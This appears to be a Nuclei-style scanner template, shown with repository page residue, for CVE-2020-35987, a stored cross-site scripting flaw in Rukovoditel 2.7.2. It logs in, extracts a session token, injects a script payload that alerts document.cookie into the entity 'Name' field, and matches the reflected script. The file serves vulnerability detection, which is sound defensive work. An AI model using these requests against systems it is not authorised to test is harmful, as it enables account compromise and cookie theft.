60 lines
1.8 KiB
YAML
60 lines
1.8 KiB
YAML
|
id: CVE-2020-35987
|
||
|
|
||
|
info:
|
||
|
name: Rukovoditel <= 2.7.2 - Cross-Site Scripting
|
||
|
author: r3Y3r53
|
||
|
severity: medium
|
||
|
description: |
|
||
|
A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.
|
||
|
reference:
|
||
|
- https://github.com/r0ck3t1973/rukovoditel/issues/1
|
||
|
- http://rukovoditel.com/
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-35987
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||
|
cvss-score: 5.4
|
||
|
cve-id: CVE-2020-35987
|
||
|
cwe-id: CWE-79
|
||
|
metadata:
|
||
|
verified: true
|
||
|
tags: cve,cve2020,rukovoditel,xss,authenticated
|
||
|
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
GET /index.php?module=users/login HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
- |
|
||
|
POST /index.php?module=users/login&action=login HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
form_session_token={{nonce}}&username={{username}}&password={{password}}
|
||
|
|
||
|
- |
|
||
|
POST /index.php?module=entities/&action=save HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=0¬es=test
|
||
|
|
||
|
cookie-reuse: true
|
||
|
redirects: true
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'status_code_3 == 200'
|
||
|
- 'contains(content_type_3, "text/html")'
|
||
|
- 'contains(body_3, "<script>alert(document.cookie)</script>")'
|
||
|
- 'contains(body_3, "rukovoditel")'
|
||
|
condition: and
|
||
|
|
||
|
extractors:
|
||
|
- type: regex
|
||
|
name: nonce
|
||
|
internal: true
|
||
|
group: 1
|
||
|
regex:
|
||
|
- 'id="form_session_token" value="(.*)" type="hidden"'
|